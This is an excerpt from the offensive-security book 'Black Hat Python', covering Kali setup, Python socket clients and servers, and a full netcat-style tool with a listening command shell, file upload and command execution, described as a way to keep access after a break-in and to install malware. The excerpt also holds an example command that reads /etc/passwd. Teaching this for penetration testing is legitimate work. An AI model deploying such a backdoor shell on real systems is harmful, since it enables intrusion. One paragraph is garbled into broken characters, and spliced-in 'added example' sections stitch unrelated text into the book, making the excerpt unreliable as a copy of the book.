Justin Seitz - Black Hat Python-Python Programming for Hackers and Pentesters


Black Hat Python: Python Programming for Hackers and Pentesters
Justin Seitz
Published by No Starch Press

To Pat
Although we never met, I am forever grateful for every member of your wonderful family you gave me.
Canadian Cancer Society
www.cancer.ca

About the Author
Justin Seitz is a senior security researcher for Immunity, Inc., where he spends his time bug hunting, reverse engineering, writing exploits, and coding Python. He is the author of Gray Hat Python, the first book to cover Python for security analysis.

About the Technical Reviewers
Dan Frisch has over ten years of experience in information security. Currently, he is a senior security analyst in a Canadian law enforcement agency. Prior to that role, he worked as a consultant providing security assessments to financial and technology firms in North America. Because he is obsessed with technology and holds a 3rd degree black belt, you can assume (correctly) that his entire life is based around The Matrix.
Since the early days of Commodore PET and VIC-20, technology has been a constant companion (and sometimes an obsession!) to Cliff Janzen. Cliff discovered his career passion when he moved to information security in 2008 after a decade of IT operations. For the past few years Cliff has been happily employed as a security consultant, doing everything from policy review to penetration tests, and he feels lucky to have a career that is also his favorite hobby.

Foreword
Python is still the dominant language in the world of information security, even if the conversation about your language of choice sometimes looks more like a religious war. Python-based tools include all manner of fuzzers, proxies, and even the occasional exploit. Exploit frameworks like CANVAS are written in Python as are more obscure tools like PyEmu or Sulley.
Just about every fuzzer or exploit I have written has been in Python. In fact, the automotive hacking research that Chris Valasek and I recently performed contained a library to inject CAN messages onto your automotive network using Python!
If you are interested in tinkering with information security tasks, Python is a great language to learn because of the large number of reverse engineering and exploitation libraries available for your use. Now if only the Metasploit developers would come to their senses and switch from Ruby to Python, our community would be united.
In this new book, Justin covers a large range of topics that an enterprising young hacker would need to get off the ground. He includes walkthroughs of how to read and write network packets, how to sniff the network, as well as anything you might need for web application auditing and attacking. He then spends significant time diving into how to write code to address specifics with attacking Windows systems. In general, Black Hat Python is a fun read, and while it might not turn you into a super stunt hacker like myself, it can certainly get you started down the path. Remember, the difference between script kiddies and professionals is the difference between merely using other people's tools and writing your own.
Charlie Miller
St. Louis, Missouri
September 2014

Preface
Python hacker. Those are two words you really could use to describe me. At Immunity, I am lucky enough to work with people who actually, really, know how to code Python. I am not one of those people. I spend a great deal of my time penetration testing, and that requires rapid Python tool development, with a focus on execution and delivering results (not necessarily on prettiness, optimization, or even stability). Throughout this book you will learn that this is how I code, but I also feel as though it is part of what makes me a strong pentester. I hope that this philosophy and style helps you as well.
As you progress through the book, you will also realize that I don't take deep dives on any single topic. This is by design. I want to give you the bare minimum, with a little flavor, so that you have some foundational knowledge. With that in mind, I've sprinkled ideas and homework assignments throughout the book to kickstart you in your own direction. I encourage you to explore these ideas, and I would love to hear back any of your own implementations, tooling, or homework assignments that you have done.
As with any technical book, readers at different skill levels with Python (or information security in general) will experience this book differently. Some of you may simply grab it and nab chapters that are pertinent to a consulting gig you are on, while others may read it cover to cover. I would recommend that if you are a novice to intermediate Python programmer that you start at the beginning of the book and read it straight through in order. You will pick up some good building blocks along the way.
To start, I lay down some networking fundamentals in Chapter 2 and slowly work our way through raw sockets in Chapter 3 and using Scapy in Chapter 4 for some more interesting network tooling. The next section of the book deals with hacking web applications, starting with your own custom tooling in Chapter 5 and then extending the popular Burp Suite in Chapter 6. From there we will spend a great deal of time talking about trojans, starting with GitHub command and control in Chapter 7, all the way through Chapter 10 where we will cover some Windows privilege escalation tricks. The final chapter is about using Volatility for automating some offensive memory forensics techniques.
I try to keep the code samples short and to the point, and the same goes for the explanations. If you are relatively new to Python I encourage you to punch out every line to get that coding muscle memory going. All of the source code examples from this book are available at http://nostarch.com/blackhatpython/.
Here we go!

Acknowledgments
I would like to thank my family — my beautiful wife, Clare, and my five children, Emily, Carter, Cohen, Brady, and Mason — for all of the encouragement and tolerance while I spent a year and a half of my life writing this book. My brothers, sister, Mom, Dad, and Paulette have also given me a lot of motivation to keep pushing through no matter what. I love you all.
To all my folks at Immunity (I would list each of you here if I had the room): thanks for tolerating me on a day-to-day basis. You are truly an amazing crew to work with. To the team at No Starch — Tyler, Bill, Serena, and Leigh — thanks so much for all of the hard work you put into this book and the rest in your collection. We all appreciate it.
I would also like to thank my technical reviewers, Dan Frisch and Cliff Janzen. These guys typed out and critiqued every single line of code, wrote supporting code, made edits, and provided absolutely amazing support throughout the whole process. Anyone who is writing an infosec book should really get these guys on board; they were amazing and then some.
For the rest of you ruffians that share drinks, laughs and GChats: thanks for letting me piss and moan to you about writing this book.

Chapter 1. Setting Up Your Python Environment
This is the least fun — but nevertheless critical — part of the book, where we walk through setting up an environment in which to write and test Python. We are going to do a crash course in setting up a Kali Linux virtual machine (VM) and installing a nice IDE so that you have everything you need to develop code. By the end of this chapter, you should be ready to tackle the exercises and code examples in the remainder of the book.
Before you get started, go ahead and download and install VMWare Player.[1] I also recommend that you have some Windows VMs at the ready as well, including Windows XP and Windows 7, preferably 32-bit in both cases.

Installing Kali Linux
Kali is the successor to the BackTrack Linux distribution, designed by Offensive Security from the ground up as a penetration testing operating system. It comes with a number of tools preinstalled and is based on Debian Linux, so you'll also be able to install a wide variety of additional tools and libraries beyond what's on the OS to start.
First, grab a Kali VM image from the following URL: http://images.offensive-security.com/kali-linux-1.0.9-vm-i486.7z.[2] Download and decompress the image, and then double-click it to make VMWare Player fire it up. The default username is root and the password is toor. This should get you into the full Kali desktop environment as shown in Figure 1-1.
Figure 1-1. The Kali Linux desktop
The first thing we are going to do is ensure that the correct version of Python is installed. This book will use Python 2.7 throughout. In the shell (Applications ▸ Accessories ▸ Terminal), execute the following:
root@kali:~# python --version
Python 2.7.3
root@kali:~#
If you downloaded the exact image that I recommended above, Python 2.7 will be automatically installed. Please note that using a different version of Python might break some of the code examples in this book. You have been warned.

Now let's add some useful pieces of Python package management in the form of easy_install and pip. These are much like the apt package manager because they allow you to directly install Python libraries, without having to manually download, unpack, and install them. Let's install both of these package managers by issuing the following commands:
root@kali:~# apt-get install python-setuptools python-pip
When the packages are installed, we can do a quick test and install the module that we'll use in Chapter 7 to build a GitHub-based trojan. Enter the following into your terminal:
root@kali:~# pip install github3.py
You should see output in your terminal indicating that the library is being downloaded and installed. Then drop into a Python shell and validate that it was installed correctly:
root@kali:~# python
Python 2.7.3 (default, Mar 14 2014, 11:57:14)
[GCC 4.7.2] on linux2
Type "help", "copyright", "credits" or "license" for more information.
>>> import github3
>>> exit()
If your results are not identical to these, then there is a "misconfiguration" in your Python environment and you have brought great shame to our Python dojo! In this case, make sure that you followed all the steps above and that you have the correct version of Kali.
Keep in mind that for most examples throughout this book, you can develop your code in a variety of environments, including Mac, Linux, and Windows. There are some chapters that are Windows-specific, and I'll make sure to let you know at the beginning of the chapter.
Now that we have our hacking virtual machine set up, let's install a Python IDE for development.

WingIDE
While I typically don't advocate commercial software products, WingIDE is the best IDE that I've used in the past seven years at Immunity. WingIDE provides all the basic IDE functionality like auto-completion and explanation of function parameters, but its debugging capabilities are what set it apart from other IDEs. I will give you a quick rundown of the commercial version of WingIDE, but of course you should choose whichever version is best for you.[3]
You can grab WingIDE from http://www.wingware.com/, and I recommend that you install the trial so that you can experience firsthand some of the features available in the commercial version.
You can do your development on any platform you wish, but it might be best to install WingIDE on your Kali VM at least to get started. If you've followed along with my instructions so far, make sure that you download the 32-bit .deb package for WingIDE, and save it to your user directory. Then drop into a terminal and run the following:
root@kali:~# dpkg -i wingide5_5.0.9-1_i386.deb
This should install WingIDE as planned. If you get any installation errors, there might be unmet dependencies. In this case, simply run:
root@kali:~# apt-get -f install
This should fix any missing dependencies and install WingIDE. To verify that you've installed it properly, make sure you can access it as shown in Figure 1-2.

Figure 1-2. Accessing WingIDE from the Kali desktop
Fire up WingIDE and open a new, blank Python file. Then follow along as I give you a quick rundown of some useful features. For starters, your screen should look like Figure 1-3, with your main code editing area in the top left and a set of tabs on the bottom.

Figure 1-3. Main WingIDE window layout
Let's write some simple code to illustrate some of the useful functions of WingIDE, including the Debug Probe and Stack Data tabs. Punch the following code into the editor:
def sum(number_one,number_two):
    number_one_int = convert_integer(number_one)
    number_two_int = convert_integer(number_two)
    result = number_one_int + number_two_int
    return result

def convert_integer(number_string):
    converted_integer = int(number_string)
    return converted_integer

answer = sum("1","2")
This is a very contrived example, but it is an excellent demonstration of how to make your life easy with WingIDE. Save it with any filename you want, click the Debug menu item, and select the Select Current as Main Debug File option, as shown in Figure 1-4.

Figure 1-4. Setting the current Python script for debugging
Now set a breakpoint on the line of code that says:
return converted_integer
You can do this by clicking in the left margin or by hitting the F9 key. You should see a little red dot appear in the margin. Now run the script by pressing F5, and execution should halt at your breakpoint. Click the Stack Data tab and you should see a screen like the one in Figure 1-5.
The Stack Data tab is going to show us some useful information such as the state of any local and global variables at the moment that our breakpoint was hit. This allows you to debug more advanced code where you need to inspect variables during execution to track down bugs. If you click the drop-down bar, you can also see the current call stack, which tells you which function called the function you are currently inside. Have a look at Figure 1-6 to see the stack trace.

Figure 1-5. Viewing stack data after a breakpoint hit

Figure 1-6. Viewing the current stack trace
We can see that convert_integer was called from the sum function on line 3 of our Python script. This becomes very useful if you have recursive function calls or a function that is called from many potential places. Using the Stack Data tab will come in very handy in your Python developing career!
The next major feature is the Debug Probe tab. This tab enables you to drop into a Python shell that is executing within the current context of the exact moment your breakpoint was hit. This lets you inspect and modify variables, as well as write little snippets of test code to try out new ideas or to troubleshoot. Figure 1-7 demonstrates how to inspect the converted_integer variable and change its value.

Figure 1-7. Using Debug Probe to inspect and modify local variables
After you make some modifications, you can resume execution of the script by pressing F5.
Even though this is a very simple example, it demonstrates some of the most useful features of WingIDE for developing and debugging Python scripts.[4]
That's all we need in order to begin developing code for the rest of this book. Don't forget about making virtual machines ready as target machines for the Windows-specific chapters, but of course using native hardware should not present any issues.
Now let's get into some actual fun!
[1] You can download VMWare Player from http://www.vmware.com/.
[2] For a "clickable" list of the links in this chapter, visit http://nostarch.com/blackhatpython/.
[3] For a comparison of features among versions, visit https://wingware.com/wingide/features/.
[4] If you already use an IDE that has comparable features to WingIDE, please send me an email or a tweet because I would love to hear about it!

Chapter 2. The Network: Basics
The network is and always will be the sexiest arena for a hacker. An attacker can do almost anything with simple network access, such as scan for hosts, inject packets, sniff data, remotely exploit hosts, and much more. But if you are an attacker who has worked your way into the deepest depths of an enterprise target, you may find yourself in a bit of a conundrum: you have no tools to execute network attacks. No netcat. No Wireshark. No compiler and no means to install one. However, you might be surprised to find that in many cases, you'll find a Python install, and so that is where we will begin.
This chapter will give you some basics on Python networking using the socket[5] module. Along the way, we'll build clients, servers, and a TCP proxy; and then turn them into our very own netcat, complete with command shell. This chapter is the foundation for subsequent chapters in which we will build a host discovery tool, implement cross-platform sniffers, and create a remote trojan framework. Let's get started.

Python Networking in a Paragraph
Programmers have a number of third-party tools to create networked servers and clients in Python, but the core module for all of those tools is socket. This module exposes all of the necessary pieces to quickly write TCP and UDP clients and servers, use raw sockets, and so forth. For the purposes of breaking in or maintaining access to target machines, this module is all you really need. Let's start by creating some simple clients and servers, the two most common quick network scripts you'll write.

TCP Client
There have been countless times during penetration tests that I've needed to whip up a TCP client to test for services, send garbage data, fuzz, or any number of other tasks. If you are working within the confines of large enterprise environments, you won't have the luxury of networking tools or compilers, and sometimes you'll even be missing the absolute basics like the ability to copy/paste or an Internet connection. This is where being able to quickly create a TCP client comes in extremely handy. But enough jabbering — let's get coding. Here is a simple TCP client.
import socket
target_host = "www.google.com"
target_port = 80
# create a socket object
➊ client = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
# connect the client
➋ client.connect((target_host,target_port))
# send some data
➌ client.send("GET / HTTP/1.1\r\nHost: google.com\r\n\r\n")
# receive some data
➍ response = client.recv(4096)
print response
We first create a socket object with the AF_INET and SOCK_STREAM parameters ➊. The AF_INET parameter is saying we are going to use a standard IPv4 address or hostname, and SOCK_STREAM indicates that this will be a TCP client. We then connect the client to the server ➋ and send it some data ➌. The last step is to receive some data back and print out the response ➍. This is the simplest form of a TCP client, but the one you will write most often.
In the above code snippet, we are making some serious assumptions about sockets that you definitely want to be aware of. The first assumption is that our connection will always succeed, and the second is that the server is always expecting us to send data first (as opposed to servers that expect to send data to you first and await your response). Our third assumption is that the server will always send us data back in a timely fashion. We make these assumptions largely for simplicity's sake. While programmers have varied opinions about how to deal with blocking sockets, exception-handling in sockets, and the like, it's quite rare for pentesters to build these niceties into the quick-and-dirty tools for recon or exploitation work, so we'll omit them in this chapter.

UDP Client
A Python UDP client is not much different than a TCP client; we need to make only two small changes to get it to send packets in UDP form.
import socket
target_host = "127.0.0.1"
target_port = 80
# create a socket object
➊ client = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
# send some data
➋ client.sendto("AAABBBCCC",(target_host,target_port))
# receive some data
➌ data, addr = client.recvfrom(4096)
print data
As you can see, we change the socket type to SOCK_DGRAM ➊ when creating the socket object. The next step is to simply call sendto() ➋, passing in the data and the server you want to send the data to. Because UDP is a connectionless protocol, there is no call to connect() beforehand. The last step is to call recvfrom() ➌ to receive UDP data back. You will also notice that it returns both the data and the details of the remote host and port.
Again, we're not looking to be superior network programmers; we want to be quick, easy, and reliable enough to handle our day-to-day hacking tasks. Let's move on to creating some simple servers.
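The "connectionless" point above has a practical consequence the book's client glosses over: recvfrom() blocks until a datagram arrives, and with UDP nothing guarantees one ever will. The following is an added example written for this edition in Python 3 (the book's code is Python 2); it is not from the book. It runs a client socket and a responder socket in one process on the loopback interface with kernel-chosen ephemeral ports, so it works offline, and shows the (data, addr) pair that recvfrom() returns on both ends, the responder using the sender address to reply. With respond=False the responder stays quiet and only the timeout saves the client from hanging. The payload and the "ECHO:" prefix are constructed for the example.

```python
import socket


def udp_exchange(payload, respond=True, timeout=0.5):
    """Send one datagram and collect the reply, UDP style.

    Returns (data, addr, target): data and addr are what the client's
    recvfrom() produced (None, None if it timed out) and target is the
    (host, port) the datagram was sent to, so a caller can confirm the
    reply really came from there.
    """
    # "server" side: a socket bound to an ephemeral loopback port
    responder = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
    responder.bind(("127.0.0.1", 0))   # port 0: kernel picks a free port
    responder.settimeout(timeout)
    target = responder.getsockname()   # constructed target for this run

    client = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
    # without a timeout a dropped datagram means recvfrom() blocks forever
    client.settimeout(timeout)
    try:
        # no connect() first: every sendto() names its own destination
        client.sendto(payload, target)
        if respond:
            # the responder's recvfrom() hands back the sender's address,
            # which is everything it needs to answer
            data, sender = responder.recvfrom(4096)
            responder.sendto(b"ECHO:" + data, sender)
        data, addr = client.recvfrom(4096)
        return data, addr, target
    except socket.timeout:
        return None, None, target
    finally:
        client.close()
        responder.close()


if __name__ == "__main__":
    print(udp_exchange(b"AAABBBCCC"))
    print(udp_exchange(b"AAABBBCCC", respond=False))
```

The timeout is the whole difference between a probe that reports "no answer" and one that sits there forever; a real UDP tool would also retransmit a few times before giving up, since a single lost datagram is normal rather than exceptional.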

TCP Server
Creating TCP servers in Python is just as easy as creating a client. You might want to use your own TCP server when writing command shells or crafting a proxy (both of which we'll do later). Let's start by creating a standard multi-threaded TCP server. Crank out the code below:
import socket
import threading

bind_ip = "0.0.0.0"
bind_port = 9999

server = socket.socket(socket.AF_INET, socket.SOCK_STREAM)

➊ server.bind((bind_ip,bind_port))
➋ server.listen(5)

print "[*] Listening on %s:%d" % (bind_ip,bind_port)

# this is our client-handling thread
➌ def handle_client(client_socket):

    # print out what the client sends
    request = client_socket.recv(1024)

    print "[*] Received: %s" % request

    # send back a packet
    client_socket.send("ACK!")
    client_socket.close()

while True:

➍   client,addr = server.accept()

    print "[*] Accepted connection from: %s:%d" % (addr[0],addr[1])

    # spin up our client thread to handle incoming data
    client_handler = threading.Thread(target=handle_client,args=(client,))
➎   client_handler.start()
To start off, we pass in the IP address and port we want the server to listen on ➊. Next we tell the server to start listening ➋ with a maximum backlog of connections set to 5. We then put the server into its main loop, where it is waiting for an incoming connection. When a client connects ➍, we receive the client socket into the client variable, and the remote connection details into the addr variable. We then create a new thread object that points to our handle_client function, and we pass it the client socket object as an argument. We then start the thread to handle the client connection ➎, and our main server loop is ready to handle another incoming connection. The handle_client function performs the recv() and then sends a simple message back to the client.
If you use the TCP client that we built earlier, you can send some test packets to the server and you should see output like the following:
[*] Listening on 0.0.0.0:9999
[*] Accepted connection from: 127.0.0.1:62512
[*] Received: ABCDEF
That's it! Pretty simple, but this is a very useful piece of code which we will extend in the next couple of sections when we build a netcat replacement and a TCP proxy.
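The TCP client section listed three assumptions the book's client makes (the connection succeeds, the server wants us to talk first, a reply arrives promptly) and the server above is the other half of that exchange. The following is an added example written for this edition in Python 3, not code from the book: a threaded "ACK!" server in the shape of the one above, plus a client that drops each of those assumptions by bounding every blocking call with a timeout, catching a refused connection, and looping on recv() until the server closes, since a single recv(4096) only promises some bytes, not the whole reply. A second, deliberately silent listener stands in for a server that never answers. Everything runs on the loopback address with kernel-chosen ports; the payloads are constructed for the example.

```python
import socket
import threading


def start_ack_server(host="127.0.0.1"):
    """Threaded TCP server like the chapter's, on an ephemeral port.
    Each client gets one recv() and an "ACK! <request>" reply, then the
    server closes the connection. Returns (listening_socket, port)."""
    server = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    server.bind((host, 0))              # port 0: kernel picks a free port
    server.listen(5)

    def handle_client(client_socket):
        with client_socket:
            request = client_socket.recv(1024)
            client_socket.sendall(b"ACK! " + request)
        # leaving the with-block closes the socket; that close is what tells
        # a careful client the reply is complete

    def accept_loop():
        while True:
            try:
                client, _addr = server.accept()
            except OSError:
                return                  # listening socket was shut down
            threading.Thread(target=handle_client, args=(client,),
                             daemon=True).start()

    threading.Thread(target=accept_loop, daemon=True).start()
    return server, server.getsockname()[1]


def start_silent_listener(host="127.0.0.1"):
    """A listener that never calls accept(). The kernel still completes the
    TCP handshake for connections in the backlog, so connect() and send()
    succeed, but no byte ever comes back: the "server speaks first" or
    "server never answers" case the chapter warns about."""
    sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    sock.bind((host, 0))
    sock.listen(1)
    return sock, sock.getsockname()[1]


def stop_listener(sock):
    """Wake any thread blocked in accept() and release the port."""
    try:
        sock.shutdown(socket.SHUT_RDWR)
    except OSError:
        pass
    sock.close()


def tcp_request(host, port, payload, timeout=2.0):
    """Connect, send payload, read until the peer closes.
    Returns (status, data) with status "ok", "refused" or "timeout"."""
    client = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    client.settimeout(timeout)          # bounds connect(), send() and recv()
    chunks = []
    try:
        client.connect((host, port))    # assumption 1: this can fail
        client.sendall(payload)         # sendall() retries partial writes
        while True:                     # assumption 3: reply may be slow,
            chunk = client.recv(4096)   # partial, or never come at all
            if not chunk:               # b"" means the peer closed: done
                break
            chunks.append(chunk)
        return "ok", b"".join(chunks)
    except ConnectionRefusedError:
        return "refused", b""
    except socket.timeout:
        return "timeout", b"".join(chunks)
    finally:
        client.close()


if __name__ == "__main__":
    server, port = start_ack_server()
    print(tcp_request("127.0.0.1", port, b"ABCDEF"))
    stop_listener(server)
```

The read loop matters beyond tidiness: a fuzzer or banner grabber that trusts one recv() will silently drop the tail of any reply larger than one segment, and a tool with no timeout will hang on the first host that accepts the connection and says nothing.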

Rep la cin g N etc a t
Netc at i s th e u ti lity k nife o f n etw ork in g, s o i t’ s n o s u rp ris e th at s h re w d s y ste m s a d m in is tr a to rs r e m ove
it f r o m th eir s y ste m s. O n m ore th an o ne o ccasio n, I ’ v e r u n i n to s e rv ers th at d o n o t h av e n etc at
in sta lle d b ut d o h av e P yth o n. I n th ese c ase s, i t’ s u se fu l to c re ate a s im ple n etw ork c lie nt a nd s e rv er
th at y o u c an u se to p ush f ile s, o r to h av e a l is te ner th at g iv es y o u c o m mand -lin e a ccess. I f y o u’v e
bro ken i n th ro ugh a w eb a p plic ati o n, i t i s d efin ite ly w orth d ro ppin g a P yth o n c allb ack to g iv e y o u
se co nd ary a ccess w ith o ut h av in g to f ir s t b urn o ne o f y o ur tr o ja ns o r b ackd oors . C re ati n g a to ol l ik e
th is i s a ls o a g re at P yth o n e xerc is e , s o l e t’ s g et s ta rte d .
import sys
import socket
import getopt
import threading
import subprocess
# define some global variables
listen = False
command = False
upload = False
execute = ""
target = ""
upload_destination = ""
port = 0
Here, we are just importing all of our necessary libraries and setting some global variables. No heavy lifting quite yet.
Now let's create our main function responsible for handling command-line arguments and calling the rest of our functions.
➊ def usage():
    print "BHP Net Tool"
    print
    print "Usage: bhpnet.py -t target_host -p port"
    print "-l --listen              - listen on [host]:[port] for incoming connections"
    print "-e --execute=file_to_run - execute the given file upon receiving a connection"
    print "-c --command             - initialize a command shell"
    print "-u --upload=destination  - upon receiving connection upload a file and write to [destination]"
    print
    print
    print "Examples: "
    print "bhpnet.py -t 192.168.0.1 -p 5555 -l -c"
    print "bhpnet.py -t 192.168.0.1 -p 5555 -l -u=c:\\target.exe"
    print "bhpnet.py -t 192.168.0.1 -p 5555 -l -e=\"cat /etc/passwd\""
    print "echo 'ABCDEFGHI' | ./bhpnet.py -t 192.168.11.12 -p 135"
    sys.exit(0)


def main():
    global listen
    global port
    global execute
    global command
    global upload_destination
    global target

    if not len(sys.argv[1:]):
        usage()

    # read the commandline options
➋   try:
        # long options that take a value need a trailing "=" so that
        # getopt consumes the following argument as that value
        opts, args = getopt.getopt(sys.argv[1:],"hle:t:p:cu:",
            ["help","listen","execute=","target=","port=","command","upload="])
    except getopt.GetoptError as err:
        print str(err)
        usage()

    for o,a in opts:
        if o in ("-h","--help"):
            usage()
        elif o in ("-l","--listen"):
            listen = True
        elif o in ("-e", "--execute"):
            execute = a
        elif o in ("-c", "--command"):
            command = True
        elif o in ("-u", "--upload"):
            upload_destination = a
        elif o in ("-t", "--target"):
            target = a
        elif o in ("-p", "--port"):
            port = int(a)
        else:
            assert False,"Unhandled Option"

    # are we going to listen or just send data from stdin?
➌   if not listen and len(target) and port > 0:
        # read in the buffer from the commandline
        # this will block, so send CTRL-D if not sending input
        # to stdin
        buffer = sys.stdin.read()

        # send data off
        client_sender(buffer)

    # we are going to listen and potentially
    # upload things, execute commands, and drop a shell back
    # depending on our command line options above
    if listen:
➍       server_loop()

main()
We begin by reading in all of the command-line options ➋ and setting the necessary variables depending on the options we detect. If any of the command-line parameters don't match our criteria, we print out useful usage information ➊. In the next block of code ➌, we are trying to mimic netcat to read data from stdin and send it across the network. As noted, if you plan on sending data interactively, you need to send a CTRL-D to bypass the stdin read. The final piece ➍ is where we detect that we are to set up a listening socket and process further commands (upload a file, execute a command, start a command shell).
Now let's start putting in the plumbing for some of these features, starting with our client code. Add the following code above our main function.
def client_sender(buffer):
    client = socket.socket(socket.AF_INET, socket.SOCK_STREAM)

    try:
        # connect to our target host
        client.connect((target, port))

        if len(buffer):  # ➊
            client.send(buffer)

        while True:
            # now wait for data back
            recv_len = 1
            response = ""

            while recv_len:  # ➋
                data = client.recv(4096)
                recv_len = len(data)
                response += data

                if recv_len < 4096:
                    break

            print response,

            # wait for more input
            buffer = raw_input("")  # ➌
            buffer += "\n"

            # send it off
            client.send(buffer)

    except:
        print "[*] Exception! Exiting."

        # tear down the connection
        client.close()
Most of this code should look familiar to you by now. We start by setting up our TCP socket object and then test ➊ to see if we have received any input from stdin. If all is well, we ship the data off to the remote target and receive back data ➋ until there is no more data to receive. We then wait for further input from the user ➌ and continue sending and receiving data until the user kills the script. The extra line break is attached specifically to our user input so that our client will be compatible with our command shell. Now we'll move on and create our primary server loop and a stub function that will handle both our command execution and our full command shell.
def server_loop():
    global target

    # if no target is defined, we listen on all interfaces
    if not len(target):
        target = "0.0.0.0"

    server = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    server.bind((target, port))
    server.listen(5)

    while True:
        client_socket, addr = server.accept()

        # spin off a thread to handle our new client
        client_thread = threading.Thread(target=client_handler,
                                         args=(client_socket,))
        client_thread.start()

def run_command(command):
    # trim the newline
    command = command.rstrip()

    # run the command and get the output back
    try:
        output = subprocess.check_output(command, stderr=subprocess.STDOUT, shell=True)  # ➊
    except:
        output = "Failed to execute command.\r\n"

    # send the output back to the client
    return output
By now, you're an old hand at creating TCP servers complete with threading, so I won't dive into the server_loop function. The run_command function, however, contains a new library we haven't covered yet: the subprocess library. subprocess provides a powerful process-creation interface that gives you a number of ways to start and interact with client programs. In this case ➊, we're simply running whatever command we pass in, running it on the local operating system, and returning the output from the command back to the client that is connected to us. The exception-handling code will catch generic errors and return back a message letting you know that the command failed.
Now let's implement the logic to do file uploads, command execution, and our shell.
def client_handler(client_socket):
    global upload
    global execute
    global command

    # check for upload
    if len(upload_destination):  # ➊

        # read in all of the bytes and write to our destination
        file_buffer = ""

        # keep reading data until none is available
        while True:  # ➋
            data = client_socket.recv(1024)

            if not data:
                break
            else:
                file_buffer += data

        # now we take these bytes and try to write them out
        try:  # ➌
            file_descriptor = open(upload_destination, "wb")
            file_descriptor.write(file_buffer)
            file_descriptor.close()

            # acknowledge that we wrote the file out
            client_socket.send("Successfully saved file to %s\r\n" % upload_destination)
        except:
            client_socket.send("Failed to save file to %s\r\n" % upload_destination)

    # check for command execution
    if len(execute):

        # run the command
        output = run_command(execute)

        client_socket.send(output)

    # now we go into another loop if a command shell was requested
    if command:  # ➍

        while True:
            # show a simple prompt
            client_socket.send("<BHP:#> ")

            # now we receive until we see a linefeed (enter key)
            cmd_buffer = ""
            while "\n" not in cmd_buffer:
                cmd_buffer += client_socket.recv(1024)

            # send back the command output
            response = run_command(cmd_buffer)

            # send back the response
            client_socket.send(response)
Our first chunk of code ➊ is responsible for determining whether our network tool is set to receive a file when it receives a connection. This can be useful for upload-and-execute exercises or for installing malware and having the malware remove our Python callback. First we receive the file data in a loop ➋ to make sure we receive it all, and then we simply open a file handle and write out the contents of the file. The wb flag ensures that we are writing the file with binary mode enabled, which ensures that uploading and writing a binary executable will be successful. Next we process our execute functionality ➌, which calls our previously written run_command function and simply sends the result back across the network. Our last bit of code handles our command shell ➍; it continues to execute commands as we send them in and sends back the output. You'll notice that it is scanning for a newline character to determine when to process a command, which makes it netcat-friendly. However, if you are conjuring up a Python client to speak to it, remember to add the newline character.
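The newline-framed command protocol the shell loop uses deserves a more careful reader than `while "\n" not in cmd_buffer`; the following is an added Python 3 example, not the book's code, and ChunkedConn is a constructed stand-in for a socket so that packet boundaries are reproducible.

```python
# Added example (Python 3, not the book's code): a reader for the newline-
# framed command protocol the shell loop above uses. The book's
# `while "\n" not in cmd_buffer` loop has two edge cases: one recv() may
# return several commands at once, or a command may arrive split across
# recv() calls with the start of the next one attached. This reader handles
# both and caps the unterminated-line length so a peer cannot grow the
# buffer without bound.


def iter_commands(conn, max_line=4096):
    """Yield each complete command (trailing CR/LF removed) read from `conn`.

    `conn` only needs a recv(n) method that returns b"" at end of stream.
    Bytes after a newline are kept in `pending` for the next command.
    """
    pending = b""
    while True:
        nl = pending.find(b"\n")
        if nl != -1:
            line, pending = pending[:nl], pending[nl + 1:]
            yield line.rstrip(b"\r").decode("utf-8", "replace")
            continue
        if len(pending) > max_line:
            raise ValueError("command exceeds %d bytes without a newline" % max_line)
        chunk = conn.recv(1024)
        if not chunk:
            # peer closed the connection; flush a final unterminated command
            if pending:
                yield pending.rstrip(b"\r").decode("utf-8", "replace")
            return
        pending += chunk


class ChunkedConn:
    """Constructed stand-in for a socket: returns the given chunks in order,
    then b"" to signal end of stream, so packet boundaries are reproducible."""

    def __init__(self, chunks):
        self.chunks = list(chunks)

    def recv(self, size):
        return self.chunks.pop(0) if self.chunks else b""


def commands_from(chunks):
    """Run the reader over constructed chunks and return the command list."""
    return list(iter_commands(ChunkedConn(chunks)))


if __name__ == "__main__":
    # two commands in one packet, then one command split across two packets
    print(commands_from([b"ls -la\npw", b"d\nwhoa", b"mi\n"]))
```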

Kicking the Tires
Now let's play around with it a bit to see some output. In one terminal or cmd.exe shell, run our script like so:
justin$ ./bhnet.py -l -p 9999 -c
Now you can fire up another terminal or cmd.exe, and run our script in client mode. Remember that our script is reading from stdin and will do so until the EOF (end-of-file) marker is received. To send EOF, hit CTRL-D on your keyboard:
justin$ ./bhnet.py -t localhost -p 9999

ls -la
total 32
drwxr-xr-x  4 justin  staff   136 18 Dec 19:45 .
drwxr-xr-x  4 justin  staff   136  9 Dec 18:09 ..
-rwxrwxrwt  1 justin  staff  8498 19 Dec 06:38 bhnet.py
-rw-r--r--  1 justin  staff   844 10 Dec 09:34 listing-1-3.py

pwd
/Users/justin/svn/BHP/code/Chapter2

You can see that we receive back our custom command shell, and because we're on a Unix host, we can run some local commands and receive back some output as if we had logged in via SSH or were on the box locally. We can also use our client to send out requests the good, old-fashioned way:
justin$ echo -ne "GET / HTTP/1.1\r\nHost: www.google.com\r\n\r\n" | ./bhnet.py -t www.google.com -p 80
HTTP/1.1 302 Found
Location: http://www.google.ca/
Cache-Control: private
Content-Type: text/html; charset=UTF-8
P3P: CP="This is not a P3P policy! See http://www.google.com/support/accounts/bin/answer.py?hl=en&answer=151657 for more info."
Date: Wed, 19 Dec 2012 13:22:55 GMT
Server: gws
Content-Length: 218
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN

302 Moved
302 Moved
The document has moved here.

[*] Exception! Exiting.
justin$
There you go! It's not a super technical technique, but it's a good foundation on how to hack together some client and server sockets in Python and use them for evil. Of course, it's the fundamentals that you need most: use your imagination to expand or improve it. Next, let's build a TCP proxy, which is useful in any number of offensive scenarios.

Building a TCP Proxy
There are a number of reasons to have a TCP proxy in your tool belt, both for forwarding traffic to bounce from host to host, but also when assessing network-based software. When performing penetration tests in enterprise environments, you'll commonly be faced with the fact that you can't run Wireshark, that you can't load drivers to sniff the loopback on Windows, or that network segmentation prevents you from running your tools directly against your target host. I have employed a simple Python proxy in a number of cases to help understand unknown protocols, modify traffic being sent to an application, and create test cases for fuzzers. Let's get to it.
import sys
import socket
import threading
